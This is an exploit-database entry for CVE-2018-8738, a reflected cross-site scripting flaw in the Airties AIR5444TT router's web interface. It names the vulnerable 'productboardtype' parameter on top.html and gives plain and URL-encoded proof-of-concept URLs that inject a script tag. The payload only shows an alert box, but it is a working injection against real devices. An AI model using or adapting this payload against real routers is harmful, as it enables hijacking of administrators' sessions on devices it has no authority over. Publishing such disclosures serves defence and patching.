id: 30683
date: 07/06/2018
title: Airties AIR5444TT - Cross-Site Scripting Vulnerability
author: Raif Berkay Dincel
cves: CVE-2018-8738

# Exploit Title: Airties AIR5444TT - Cross-Site Scripting
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: airties.com 
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# CVE-ID: CVE-2018-8738
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
  
# Vulnerable Parameter Type: GET 
# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype= 
  
# Proof of Concepts:
  
192.168.2.1/top.html?page=main&productboardtype=<script>alert("Raif Berkay Dincel");</script>
  
http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E

#  0day.today [2023-03-24]  #